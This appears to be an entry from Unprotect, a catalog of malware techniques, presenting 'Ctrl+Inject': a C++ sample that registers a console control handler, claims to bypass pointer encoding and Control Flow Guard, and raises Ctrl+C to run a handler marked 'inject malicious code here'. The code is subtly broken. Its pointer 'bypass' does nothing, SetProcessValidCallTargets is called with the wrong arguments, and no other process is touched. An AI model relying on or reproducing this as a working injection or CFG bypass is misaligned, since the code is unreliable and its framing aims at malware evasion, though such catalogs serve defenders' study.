(C++) Ctrl+Inject by Unprotect

Created the Thursday 29 December 2022. Updated 5 months ago.

Description:

This code first defines a callback function called ControlSignalHandler that will be used to inject malicious code. It then bypasses pointer encoding and control flow guard to ensure that the function can be called. Finally, it sets the callback function for control signal handlers using the SetConsoleCtrlHandler function and triggers a control signal by calling GenerateConsoleCtrlEvent.

Code

            #include <Windows.h>
#include <cstdio>

// callback function for control signal handlers
BOOL WINAPI ControlSignalHandler(DWORD dwCtrlType)
{
    // inject malicious code here

    return TRUE;
}

int main()
{
    // bypass pointer encoding
    void* encodedPointer = EncodePointer((PVOID)ControlSignalHandler);
    void* decodedPointer = DecodePointer(encodedPointer);

    // bypass control flow guard
    SetProcessValidCallTargets(GetCurrentProcess(), (UINT_PTR)decodedPointer, sizeof(void*));

    // set callback function for control signal handlers
    SetConsoleCtrlHandler((PHANDLER_ROUTINE)decodedPointer, TRUE);

    // trigger control signal (Ctrl+C)
    GenerateConsoleCtrlEvent(CTRL_C_EVENT, 0);

    return 0;
}